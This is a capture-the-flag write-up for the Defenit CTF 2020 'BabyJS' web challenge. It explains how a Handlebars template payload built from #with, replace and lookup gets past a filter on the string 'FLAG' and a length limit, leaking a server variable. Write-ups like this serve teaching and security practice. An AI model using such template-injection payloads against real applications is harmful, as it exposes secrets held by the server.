Tags: handlebars web 


# BabyJS
*Defenit CTF 2020 - Web 248*

*Writeup by Payload as ToEatSushi*

## Problem

Render me If you can.

## Look up


/* ... */
if (typeof content === 'string' && content.indexOf('FLAG') != -1 || typeof content === 'string' && content.length > 200) {
res.end('Request blocked');
/* ... */

app.get('/', (req, res) => {
const { p } = req.query;
if (!p) res.redirect('/?p=index');
else res.render(p, { FLAG, 'apple': 'mint' });

app.post('/', (req, res) => {
const { body: { content }, userDir, saveDir } = req;
const filename = crypto.randomBytes(8).toString('hex');

let p = path.join('temp', userDir, filename)

fs.writeFile(`${path.join(saveDir, filename)}.html`, content, () => {


Okay, we can render our own template which has <=200 bytes, and don't contians string `FLAG`. Template engine is handlebars.

## Handlebars 101

Handlebars save there own templating environ in object `this`. In fact, when we try `{{ log this }}`, then node.js console shows the structure of `this` and it includes `FLAG` and `apple`.

And, there is a one more important feature `lookup`. It returns a value of object with key. In here, key can be either string or identifier. Like, when `a='FLAG'` then, `{{lookup this a}}` will give a flag.

Finally, `#with` statement allows us to do a lot of things. Actually, it's really like javascript's `with`, which moves scope into the given object.

## Exploit

{{#with this as |k|}}
{{#with "FLag"}}
{{#with (replace "ag" "AG") as |payload|}}
{{lookup k payload}}


Simple explantation:
1. Save top `this` as k to prevent this is overwritten in other with block
2. with "FLag", move scope into `String "FLag"`
3. Call member function `replace` under "FLag", to make "FLAG". Save it to payload
4. Lookup saved k and get flag.

Anyway, the flag is not related with this challenge. Actually, it'll be a great hint of AdultJS.


Original writeup (https://github.com/mdsnins/ctf-writeups/blob/master/2020/Defenit%20CTF/BabyJS/babyjs.md).